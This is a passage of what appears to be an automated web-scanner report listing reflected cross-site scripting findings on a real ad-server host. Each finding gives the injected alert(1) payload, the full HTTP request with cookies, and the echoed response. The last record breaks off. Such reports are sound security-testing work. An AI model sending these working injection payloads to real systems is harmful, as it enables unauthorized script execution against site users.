function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3001466a"-alert(1)-"b3b7c22333a";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.368. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1394936567@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b11b1"-alert(1)-"34cc5b8ecc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b11b1"-alert(1)-"34cc5b8ecc=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2485
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b11b1"-alert(1)-"34cc5b8ecc=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.369. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1636403816@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1160"><script>alert(1)</script>c85ff46a2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMf1160"><script>alert(1)</script>c85ff46a2ce/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMf1160"><script>alert(1)</script>c85ff46a2ce/2010DM/1783622683/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.370. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1636403816@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69287"><script>alert(1)</script>33cb0a82ffa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM69287"><script>alert(1)</script>33cb0a82ffa/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM69287"><script>alert(1)</script>33cb0a82ffa/455163895/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.371. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1636403816@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f04"><script>alert(1)</script>7d4d4d5514e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1636403816@x2320f04"><script>alert(1)</script>7d4d4d5514e?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1858296443/x2320f04"><script>alert(1)</script>7d4d4d5514e/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.372. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1636403816@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40281"-alert(1)-"380d67eabc7 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_72840281"-alert(1)-"380d67eabc7 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_72840281"-alert(1)-"380d67eabc7";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.373. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1636403816@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 906d8"-alert(1)-"52b95d4418a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&906d8"-alert(1)-"52b95d4418a=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&906d8"-alert(1)-"52b95d4418a=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.374. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1670623313@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1272e"><script>alert(1)</script>8fdf9178846 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM1272e"><script>alert(1)</script>8fdf9178846/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM1272e"><script>alert(1)</script>8fdf9178846/2010DM/1612541180/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.375. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1670623313@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed86"><script>alert(1)</script>f1a30b8d9f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMeed86"><script>alert(1)</script>f1a30b8d9f7/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMeed86"><script>alert(1)</script>f1a30b8d9f7/2065109648/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.376. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1670623313@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2e1"><script>alert(1)</script>1981e911952 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1670623313@x23de2e1"><script>alert(1)</script>1981e911952?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/134522517/x23de2e1"><script>alert(1)</script>1981e911952/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.377. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1670623313@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b0f4"-alert(1)-"1442e938870 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_7285b0f4"-alert(1)-"1442e938870 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_7285b0f4"-alert(1)-"1442e938870";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.378. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1670623313@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdfee"-alert(1)-"5a6dcd4bc89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&cdfee"-alert(1)-"5a6dcd4bc89=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&cdfee"-alert(1)-"5a6dcd4bc89=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.379. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1874556783@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ed0"><script>alert(1)</script>c14b682a958 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM85ed0"><script>alert(1)</script>c14b682a958/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
